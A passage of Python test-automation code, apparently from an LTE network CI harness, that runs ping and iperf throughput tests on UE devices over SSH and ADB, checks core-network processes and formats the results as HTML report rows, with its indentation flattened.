logging.debug('\u001B[1mUE (' + device_id + ') IP Address ' + UE_IPAddress + 'has been existed!' + '\u001B[0m')
ue_ip_status -= 1
continue
self.UEIPAddresses.append(UE_IPAddress)
self.close()
return ue_ip_status
def ping_iperf_wrong_exit(self, lock, UE_IPAddress, device_id, statusQueue, message):
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(message)
lock.release()
def Ping_common(self, lock, UE_IPAddress, device_id, statusQueue):
try:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
ping_time = re.findall("-c (\d+)",str(self.ping_args))
ping_status = self.command('stdbuf -o0 ping ' + self.ping_args + ' ' + UE_IPAddress + ' 2>&1 | stdbuf -o0 tee -a ping_' + self.testCase_id + '_' + device_id + '.log', '\$', int(ping_time[0])*1.5)
# TIMEOUT CASE
if ping_status < 0:
message = 'Ping with UE (' + str(UE_IPAddress) + ') crashed due to TIMEOUT!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
result = re.search(', (?P<packetloss>[0-9\.]+)% packet loss, time [0-9\.]+ms', str(self.ssh.before))
if result is None:
message = 'Packet Loss Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
packetloss = result.group('packetloss')
if float(packetloss) == 100:
message = 'Packet Loss is 100%'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
result = re.search('rtt min\/avg\/max\/mdev = (?P<rtt_min>[0-9\.]+)\/(?P<rtt_avg>[0-9\.]+)\/(?P<rtt_max>[0-9\.]+)\/[0-9\.]+ ms', str(self.ssh.before))
if result is None:
message = 'Ping RTT_Min RTT_Avg RTT_Max Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
rtt_min = result.group('rtt_min')
rtt_avg = result.group('rtt_avg')
rtt_max = result.group('rtt_max')
pal_msg = 'Packet Loss : ' + packetloss + '%'
min_msg = 'RTT(Min) : ' + rtt_min + ' ms'
avg_msg = 'RTT(Avg) : ' + rtt_avg + ' ms'
max_msg = 'RTT(Max) : ' + rtt_max + ' ms'
lock.acquire()
logging.debug('\u001B[1;37;44m ping result (' + UE_IPAddress + ') \u001B[0m')
logging.debug('\u001B[1;34m ' + pal_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + min_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + avg_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + max_msg + '\u001B[0m')
qMsg = pal_msg + '\n' + min_msg + '\n' + avg_msg + '\n' + max_msg
packetLossOK = True
if packetloss is not None:
if float(packetloss) > float(self.ping_packetloss_threshold):
qMsg += '\nPacket Loss too high'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
packetLossOK = False
elif float(packetloss) > 0:
qMsg += '\nPacket Loss is not 0%'
logging.debug('\u001B[1;30;43m Packet Loss is not 0% \u001B[0m')
if (packetLossOK):
statusQueue.put(0)
else:
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(qMsg)
lock.release()
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def Ping(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
initialize_eNB_flag = False
pStatus = self.CheckProcessExist(initialize_eNB_flag)
if (pStatus < 0):
self.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
ueIpStatus = self.GetAllUEIPAddresses()
if (ueIpStatus < 0):
self.CreateHtmlTestRow(self.ping_args, 'KO', UE_IP_ADDRESS_ISSUE)
self.CreateHtmlTabFooter(False)
sys.exit(1)
multi_jobs = []
i = 0
lock = Lock()
status_queue = SimpleQueue()
for UE_IPAddress in self.UEIPAddresses:
device_id = self.UEDevices[i]
p = Process(target = self.Ping_common, args = (lock,UE_IPAddress,device_id,status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
i = i + 1
for job in multi_jobs:
job.join()
if (status_queue.empty()):
self.CreateHtmlTestRow(self.ping_args, 'KO', ALL_PROCESSES_OK)
self.AutoTerminateUEandeNB()
self.CreateHtmlTabFooter(False)
sys.exit(1)
else:
ping_status = True
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
ping_status = False
device_id = status_queue.get()
ip_addr = status_queue.get()
message = status_queue.get()
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\nIP Address : ' + ip_addr + '\n' + message + '</pre>'
html_queue.put(html_cell)
if (ping_status):
self.CreateHtmlTestRowQueue(self.ping_args, 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRowQueue(self.ping_args, 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
self.CreateHtmlTabFooter(False)
sys.exit(1)
def Iperf_ComputeTime(self):
result = re.search('-t (?P<iperf_time>\d+)', str(self.iperf_args))
if result is None:
logging.debug('\u001B[1;37;41m Iperf time Not Found! \u001B[0m')
sys.exit(1)
return result.group('iperf_time')
def Iperf_ComputeModifiedBW(self, idx, ue_num):
result = re.search('-b (?P<iperf_bandwidth>[0-9\.]+)[KMG]', str(self.iperf_args))
if result is None:
logging.debug('\u001B[1;37;41m Iperf bandwidth Not Found! \u001B[0m')
sys.exit(1)
iperf_bandwidth = result.group('iperf_bandwidth')
if self.iperf_profile == 'balanced':
iperf_bandwidth_new = float(iperf_bandwidth)/ue_num
if self.iperf_profile == 'single-ue':
iperf_bandwidth_new = float(iperf_bandwidth)
if self.iperf_profile == 'unbalanced':
# residual is 2% of max bw
residualBW = float(iperf_bandwidth) / 50
if idx == 0:
iperf_bandwidth_new = float(iperf_bandwidth) - ((ue_num - 1) * residualBW)
else:
iperf_bandwidth_new = residualBW
iperf_bandwidth_str = '-b ' + iperf_bandwidth
iperf_bandwidth_str_new = '-b ' + ('%.2f' % iperf_bandwidth_new)
result = re.sub(iperf_bandwidth_str, iperf_bandwidth_str_new, str(self.iperf_args))
if result is None:
logging.debug('\u001B[1;37;41m Calculate Iperf bandwidth Failed! \u001B[0m')
sys.exit(1)
return result
def Iperf_analyzeV2TCPOutput(self, lock, UE_IPAddress, device_id, statusQueue, iperf_real_options):
self.command('awk -f /tmp/tcp_iperf_stats.awk /tmp/CI-eNB/scripts/iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
result = re.search('Avg Bitrate : (?P<average>[0-9\.]+ Mbits\/sec) Max Bitrate : (?P<maximum>[0-9\.]+ Mbits\/sec) Min Bitrate : (?P<minimum>[0-9\.]+ Mbits\/sec)', str(self.ssh.before))
if result is not None:
avgbitrate = result.group('average')
maxbitrate = result.group('maximum')
minbitrate = result.group('minimum')
lock.acquire()
logging.debug('\u001B[1;37;44m TCP iperf result (' + UE_IPAddress + ') \u001B[0m')
msg = 'TCP Stats :\n'
if avgbitrate is not None:
logging.debug('\u001B[1;34m Avg Bitrate : ' + avgbitrate + '\u001B[0m')
msg += 'Avg Bitrate : ' + avgbitrate + '\n'
if maxbitrate is not None:
logging.debug('\u001B[1;34m Max Bitrate : ' + maxbitrate + '\u001B[0m')
msg += 'Max Bitrate : ' + maxbitrate + '\n'
if minbitrate is not None:
logging.debug('\u001B[1;34m Min Bitrate : ' + minbitrate + '\u001B[0m')
msg += 'Min Bitrate : ' + minbitrate + '\n'
statusQueue.put(0)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(msg)
lock.release()
return 0
def Iperf_analyzeV2Output(self, lock, UE_IPAddress, device_id, statusQueue, iperf_real_options):
result = re.search('-u', str(iperf_real_options))
if result is None:
return self.Iperf_analyzeV2TCPOutput(lock, UE_IPAddress, device_id, statusQueue, iperf_real_options)
result = re.search('Server Report:', str(self.ssh.before))
if result is None:
result = re.search('read failed: Connection refused', str(self.ssh.before))
if result is not None:
logging.debug('\u001B[1;37;41m Could not connect to iperf server! \u001B[0m')
else:
logging.debug('\u001B[1;37;41m Server Report and Connection refused Not Found! \u001B[0m')
return -1
# Computing the requested bandwidth in float
result = re.search('-b (?P<iperf_bandwidth>[0-9\.]+)[KMG]', str(iperf_real_options))
if result is not None:
req_bandwidth = result.group('iperf_bandwidth')
req_bw = float(req_bandwidth)
result = re.search('-b [0-9\.]+K', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Kbits/sec' % req_bw
req_bw = req_bw * 1000
result = re.search('-b [0-9\.]+M', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Mbits/sec' % req_bw
req_bw = req_bw * 1000000
result = re.search('-b [0-9\.]+G', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Gbits/sec' % req_bw
req_bw = req_bw * 1000000000
result = re.search('Server Report:\\\\r\\\\n(?:|\[ *\d+\].*) (?P<bitrate>[0-9\.]+ [KMG]bits\/sec) +(?P<jitter>[0-9\.]+ ms) +(\d+\/..\d+) (\((?P<packetloss>[0-9\.]+)%\))', str(self.ssh.before))
if result is not None:
bitrate = result.group('bitrate')
packetloss = result.group('packetloss')
jitter = result.group('jitter')
lock.acquire()
logging.debug('\u001B[1;37;44m iperf result (' + UE_IPAddress + ') \u001B[0m')
iperfStatus = True
msg = 'Req Bitrate : ' + req_bandwidth + '\n'
logging.debug('\u001B[1;34m Req Bitrate : ' + req_bandwidth + '\u001B[0m')
if bitrate is not None:
msg += 'Bitrate : ' + bitrate + '\n'
logging.debug('\u001B[1;34m Bitrate : ' + bitrate + '\u001B[0m')
result = re.search('(?P<real_bw>[0-9\.]+) [KMG]bits/sec', str(bitrate))
if result is not None:
actual_bw = float(str(result.group('real_bw')))
result = re.search('[0-9\.]+ K', bitrate)
if result is not None:
actual_bw = actual_bw * 1000
result = re.search('[0-9\.]+ M', bitrate)
if result is not None:
actual_bw = actual_bw * 1000000
result = re.search('[0-9\.]+ G', bitrate)
if result is not None:
actual_bw = actual_bw * 1000000000
br_loss = 100 * actual_bw / req_bw
bitperf = '%.2f ' % br_loss
msg += 'Bitrate Perf: ' + bitperf + '%\n'
logging.debug('\u001B[1;34m Bitrate Perf: ' + bitperf + '%\u001B[0m')
if packetloss is not None:
msg += 'Packet Loss : ' + packetloss + '%\n'
logging.debug('\u001B[1;34m Packet Loss : ' + packetloss + '%\u001B[0m')
if float(packetloss) > float(self.iperf_packetloss_threshold):
msg += 'Packet Loss too high!\n'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
iperfStatus = False
if jitter is not None:
msg += 'Jitter : ' + jitter + '\n'
logging.debug('\u001B[1;34m Jitter : ' + jitter + '\u001B[0m')
if (iperfStatus):
statusQueue.put(0)
else:
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(msg)
lock.release()
return 0
def Iperf_analyzeV2Server(self, lock, UE_IPAddress, device_id, statusQueue, iperf_real_options):
if (not os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, 'Could not analyze from server log')
return
# Computing the requested bandwidth in float
result = re.search('-b (?P<iperf_bandwidth>[0-9\.]+)[KMG]', str(iperf_real_options))
if result is None:
logging.debug('Iperf bandwidth Not Found!')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, 'Could not compute Iperf bandwidth!')
return
else:
req_bandwidth = result.group('iperf_bandwidth')
req_bw = float(req_bandwidth)
result = re.search('-b [0-9\.]+K', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Kbits/sec' % req_bw
req_bw = req_bw * 1000
result = re.search('-b [0-9\.]+M', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Mbits/sec' % req_bw
req_bw = req_bw * 1000000
result = re.search('-b [0-9\.]+G', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Gbits/sec' % req_bw
req_bw = req_bw * 1000000000
server_file = open('iperf_server_' + self.testCase_id + '_' + device_id + '.log', 'r')
br_sum = 0.0
ji_sum = 0.0
pl_sum = 0
ps_sum = 0
row_idx = 0
for line in server_file.readlines():
result = re.search('(?P<bitrate>[0-9\.]+ [KMG]bits\/sec) +(?P<jitter>[0-9\.]+ ms) +(?P<lostPack>[0-9]+)/ +(?P<sentPack>[0-9]+)', str(line))
if result is not None:
bitrate = result.group('bitrate')
jitter = result.group('jitter')
packetlost = result.group('lostPack')
packetsent = result.group('sentPack')
br = bitrate.split(' ')
ji = jitter.split(' ')
row_idx = row_idx + 1
curr_br = float(br[0])
pl_sum = pl_sum + int(packetlost)
ps_sum = ps_sum + int(packetsent)
if (br[1] == 'Kbits/sec'):
curr_br = curr_br * 1000
if (br[1] == 'Mbits/sec'):
curr_br = curr_br * 1000 * 1000
br_sum = curr_br + br_sum
ji_sum = float(ji[0]) + ji_sum
if (row_idx > 0):
br_sum = br_sum / row_idx
ji_sum = ji_sum / row_idx
br_loss = 100 * br_sum / req_bw
if (br_sum > 1000):
br_sum = br_sum / 1000
if (br_sum > 1000):
br_sum = br_sum / 1000
bitrate = '%.2f Mbits/sec' % br_sum
else:
bitrate = '%.2f Kbits/sec' % br_sum
else:
bitrate = '%.2f bits/sec' % br_sum
bitperf = '%.2f ' % br_loss
bitperf += '%'
jitter = '%.2f ms' % (ji_sum)
if (ps_sum > 0):
pl = float(100 * pl_sum / ps_sum)
packetloss = '%2.1f ' % (pl)
packetloss += '%'
else:
packetloss = 'unknown'
lock.acquire()
if (br_loss < 90):
statusQueue.put(1)
else:
statusQueue.put(0)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
req_msg = 'Req Bitrate : ' + req_bandwidth
bir_msg = 'Bitrate : ' + bitrate
brl_msg = 'Bitrate Perf: ' + bitperf
jit_msg = 'Jitter : ' + jitter
pal_msg = 'Packet Loss : ' + packetloss
statusQueue.put(req_msg + '\n' + bir_msg + '\n' + brl_msg + '\n' + jit_msg + '\n' + pal_msg + '\n')
logging.debug('\u001B[1;37;45m iperf result (' + UE_IPAddress + ') \u001B[0m')
logging.debug('\u001B[1;35m ' + req_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + bir_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + brl_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + jit_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + pal_msg + '\u001B[0m')
lock.release()
else:
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, 'Could not analyze from server log')
server_file.close()
def Iperf_analyzeV3Output(self, lock, UE_IPAddress, device_id, statusQueue):
result = re.search('(?P<bitrate>[0-9\.]+ [KMG]bits\/sec) +(?:|[0-9\.]+ ms +\d+\/\d+ \((?P<packetloss>[0-9\.]+)%\)) +(?:|receiver)\\\\r\\\\n(?:|\[ *\d+\] Sent \d+ datagrams)\\\\r\\\\niperf Done\.', str(self.ssh.before))
if result is None:
result = re.search('(?P<error>iperf: error - [a-zA-Z0-9 :]+)', str(self.ssh.before))
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
if result is not None:
logging.debug('\u001B[1;37;41m ' + result.group('error') + ' \u001B[0m')
statusQueue.put(result.group('error'))
else:
logging.debug('\u001B[1;37;41m Bitrate and/or Packet Loss Not Found! \u001B[0m')
statusQueue.put('Bitrate and/or Packet Loss Not Found!')
lock.release()
bitrate = result.group('bitrate')
packetloss = result.group('packetloss')
lock.acquire()
logging.debug('\u001B[1;37;44m iperf result (' + UE_IPAddress + ') \u001B[0m')
logging.debug('\u001B[1;34m Bitrate : ' + bitrate + '\u001B[0m')
msg = 'Bitrate : ' + bitrate + '\n'
iperfStatus = True
if packetloss is not None:
logging.debug('\u001B[1;34m Packet Loss : ' + packetloss + '%\u001B[0m')
msg += 'Packet Loss : ' + packetloss + '%\n'
if float(packetloss) > float(self.iperf_packetloss_threshold):
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
msg += 'Packet Loss too high!\n'
iperfStatus = False
if (iperfStatus):
statusQueue.put(0)
else:
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(msg)
lock.release()
def Iperf_UL_common(self, lock, UE_IPAddress, device_id, idx, ue_num, statusQueue):
udpIperf = True
result = re.search('-u', str(self.iperf_args))
if result is None:
udpIperf = False
ipnumbers = UE_IPAddress.split('.')
if (len(ipnumbers) == 4):
ipnumbers[3] = '1'
EPC_Iperf_UE_IPAddress = ipnumbers[0] + '.' + ipnumbers[1] + '.' + ipnumbers[2] + '.' + ipnumbers[3]
# Launch iperf server on EPC side
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
self.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
port = 5001 + idx
if udpIperf:
self.command('echo $USER; nohup iperf -u -s -i 1 -p ' + str(port) + ' > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.EPCUserName, 5)
else:
self.command('echo $USER; nohup iperf -s -i 1 -p ' + str(port) + ' > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.EPCUserName, 5)
time.sleep(0.5)
self.close()
# Launch iperf client on UE
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
iperf_time = self.Iperf_ComputeTime()
time.sleep(0.5)
if udpIperf:
modified_options = self.Iperf_ComputeModifiedBW(idx, ue_num)
else:
modified_options = str(self.iperf_args)
modified_options = modified_options.replace('-R','')
time.sleep(0.5)
self.command('rm -f iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
iperf_status = self.command('stdbuf -o0 adb -s ' + device_id + ' shell "/data/local/tmp/iperf -c ' + EPC_Iperf_UE_IPAddress + ' ' + modified_options + ' -p ' + str(port) + '" 2>&1 | stdbuf -o0 tee -a iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
# TIMEOUT Case
if iperf_status < 0:
self.close()
message = 'iperf on UE (' + str(UE_IPAddress) + ') crashed due to TIMEOUT !'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
clientStatus = self.Iperf_analyzeV2Output(lock, UE_IPAddress, device_id, statusQueue, modified_options)
self.close()
# Kill iperf server on EPC side
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('killall --signal SIGKILL iperf', self.EPCUserName, 5)
self.close()
# in case of failure, retrieve server log
if (clientStatus == -1):
time.sleep(1)
if (os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
os.remove('iperf_server_' + self.testCase_id + '_' + device_id + '.log')
self.copyin(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, self.EPCSourceCodePath + '/scripts/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
self.Iperf_analyzeV2Server(lock, UE_IPAddress, device_id, statusQueue, modified_options)
def Iperf_common(self, lock, UE_IPAddress, device_id, idx, ue_num, statusQueue):
try:
# Single-UE profile -- iperf only on one UE
if self.iperf_profile == 'single-ue' and idx != 0:
return
useIperf3 = False
udpIperf = True
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# if by chance ADB server and EPC are on the same remote host, at least log collection will take care of it
self.command('if [ ! -d ' + self.EPCSourceCodePath + '/scripts ]; then mkdir -p ' + self.EPCSourceCodePath + '/scripts ; fi', '\$', 5)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
# Checking if iperf / iperf3 are installed
self.command('adb -s ' + device_id + ' shell "ls /data/local/tmp"', '\$', 5)
result = re.search('iperf3', str(self.ssh.before))
if result is None:
result = re.search('iperf', str(self.ssh.before))
if result is None:
message = 'Neither iperf nor iperf3 installed on UE!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
else:
useIperf3 = True
# in case of iperf, UL has its own function
if (not useIperf3):
result = re.search('-R', str(self.iperf_args))
if result is not None:
self.close()
self.Iperf_UL_common(lock, UE_IPAddress, device_id, idx, ue_num, statusQueue)
return
if (useIperf3):
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/iperf3 -s &', '\$', 5)
else:
self.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
result = re.search('-u', str(self.iperf_args))
if result is None:
self.command('echo $USER; nohup adb -s ' + device_id + ' shell "/data/local/tmp/iperf -s -i 1" > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.ADBUserName, 5)
udpIperf = False
else:
self.command('echo $USER; nohup adb -s ' + device_id + ' shell "/data/local/tmp/iperf -u -s -i 1" > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.ADBUserName, 5)
time.sleep(0.5)
self.close()
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
iperf_time = self.Iperf_ComputeTime()
time.sleep(0.5)
if udpIperf:
modified_options = self.Iperf_ComputeModifiedBW(idx, ue_num)
else:
modified_options = str(self.iperf_args)
time.sleep(0.5)
self.command('rm -f iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
if (useIperf3):
self.command('stdbuf -o0 iperf3 -c ' + UE_IPAddress + ' ' + modified_options + ' 2>&1 | stdbuf -o0 tee -a iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
clientStatus = 0
self.Iperf_analyzeV3Output(lock, UE_IPAddress, device_id, statusQueue)
else:
iperf_status = self.command('stdbuf -o0 iperf -c ' + UE_IPAddress + ' ' + modified_options + ' 2>&1 | stdbuf -o0 tee -a iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
if iperf_status < 0:
self.close()
message = 'iperf on UE (' + str(UE_IPAddress) + ') crashed due to TIMEOUT !'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
clientStatus = self.Iperf_analyzeV2Output(lock, UE_IPAddress, device_id, statusQueue, modified_options)
self.close()
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('stdbuf -o0 adb -s ' + device_id + ' shell ps | grep --color=never iperf | grep -v grep', '\$', 5)
result = re.search('shell +(?P<pid>\d+)', str(self.ssh.before))
if result is not None:
pid_iperf = result.group('pid')
self.command('stdbuf -o0 adb -s ' + device_id + ' shell kill -KILL ' + pid_iperf, '\$', 5)
self.close()
if (clientStatus == -1):
time.sleep(1)
if (os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
os.remove('iperf_server_' + self.testCase_id + '_' + device_id + '.log')
self.copyin(self.ADBIPAddress, self.ADBUserName, self.ADBPassword, self.EPCSourceCodePath + '/scripts/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
self.Iperf_analyzeV2Server(lock, UE_IPAddress, device_id, statusQueue, modified_options)
except:
os.kill(os.getppid(),signal.SIGUSR1)
def Iperf(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '' or self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
initialize_eNB_flag = False
pStatus = self.CheckProcessExist(initialize_eNB_flag)
if (pStatus < 0):
self.CreateHtmlTestRow(self.iperf_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
self.CreateHtmlTabFooter(False)
sys.exit(1)
ueIpStatus = self.GetAllUEIPAddresses()
if (ueIpStatus < 0):
self.CreateHtmlTestRow(self.iperf_args, 'KO', UE_IP_ADDRESS_ISSUE)
self.AutoTerminateUEandeNB()
self.CreateHtmlTabFooter(False)
sys.exit(1)
multi_jobs = []
i = 0
ue_num = len(self.UEIPAddresses)
lock = Lock()
status_queue = SimpleQueue()
for UE_IPAddress in self.UEIPAddresses:
device_id = self.UEDevices[i]
p = Process(target = SSH.Iperf_common, args = (lock,UE_IPAddress,device_id,i,ue_num,status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
i = i + 1
for job in multi_jobs:
job.join()
if (status_queue.empty()):
self.CreateHtmlTestRow(self.iperf_args, 'KO', ALL_PROCESSES_OK)
self.AutoTerminateUEandeNB()
self.CreateHtmlTabFooter(False)
sys.exit(1)
else:
iperf_status = True
iperf_noperf = False
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
iperf_status = False
if (count > 0):
iperf_noperf = True
device_id = status_queue.get()
ip_addr = status_queue.get()
message = status_queue.get()
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\nIP Address : ' + ip_addr + '\n' + message + '</pre>'
html_queue.put(html_cell)
if (iperf_noperf and iperf_status):
self.CreateHtmlTestRowQueue(self.iperf_args, 'PERF NOT MET', len(self.UEDevices), html_queue)
elif (iperf_status):
self.CreateHtmlTestRowQueue(self.iperf_args, 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRowQueue(self.iperf_args, 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
self.CreateHtmlTabFooter(False)
sys.exit(1)
def CheckProcessExist(self, initialize_eNB_flag):
multi_jobs = []
status_queue = SimpleQueue()
p = Process(target = SSH.CheckHSSProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
p = Process(target = SSH.CheckMMEProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
p = Process(target = SSH.CheckSPGWProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
if initialize_eNB_flag == False:
p = Process(target = SSH.CheckeNBProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
if (status_queue.empty()):
return -15
else:
result = 0
while (not status_queue.empty()):
status = status_queue.get()
if (status < 0):
result = status
if result == ENB_PROCESS_FAILED:
fileCheck = re.search('enb_', str(self.eNBLogFile))
if fileCheck is not None:
self.copyin(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, self.eNBSourceCodePath + '/cmake_targets/' + self.eNBLogFile, '.')
logStatus = self.AnalyzeLogFile_eNB(self.eNBLogFile)
if logStatus < 0:
result = logStatus
return result
def CheckeNBProcess(self, status_queue):
try:
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('stdbuf -o0 ps -aux | grep -v grep | grep --color=never lte-softmodem', '\$', 5)
result = re.search('lte-softmodem', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m eNB Process Not Found! \u001B[0m')
status_queue.put(ENB_PROCESS_FAILED)
else:
status_queue.put(ENB_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckHSSProcess(self, status_queue):
try:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('stdbuf -o0 ps -aux | grep -v grep | grep --color=never hss', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
else:
result = re.search('hss_sim s6as diam_hss', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m HSS Process Not Found! \u001B[0m')
status_queue.put(HSS_PROCESS_FAILED)
else:
status_queue.put(HSS_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckMMEProcess(self, status_queue):
try:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('stdbuf -o0 ps -aux | grep -v grep | grep --color=never mme', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
else:
result = re.search('mme', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m MME Process Not Found! \u001B[0m')
status_queue.put(MME_PROCESS_FAILED)
else:
status_queue.put(MME_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckSPGWProcess(self, status_queue):
try:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('stdbuf -o0 ps -aux | grep -v grep | grep --color=never spgw', '\$', 5)
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
else:
self.command('stdbuf -o0 ps -aux | grep -v grep | grep --color=never xGw', '\$', 5)
result = re.search('xGw', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m SPGW Process Not Found! \u001B[0m')
status_queue.put(SPGW_PROCESS_FAILED)
else:
status_queue.put(SPGW_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def AnalyzeLogFile_eNB(self, eNBlogFile):
if (not os.path.isfile('./' + eNBlogFile)):
return -1
enb_log_file = open('./' + eNBlogFile, 'r')
foundAssertion = False
msgAssertion = ''
msgLine = 0
foundSegFault = False
foundRealTimeIssue = False
rrcSetupRequest = 0
rrcSetupComplete = 0
rrcReleaseRequest = 0
rrcReconfigRequest = 0
rrcReconfigComplete = 0
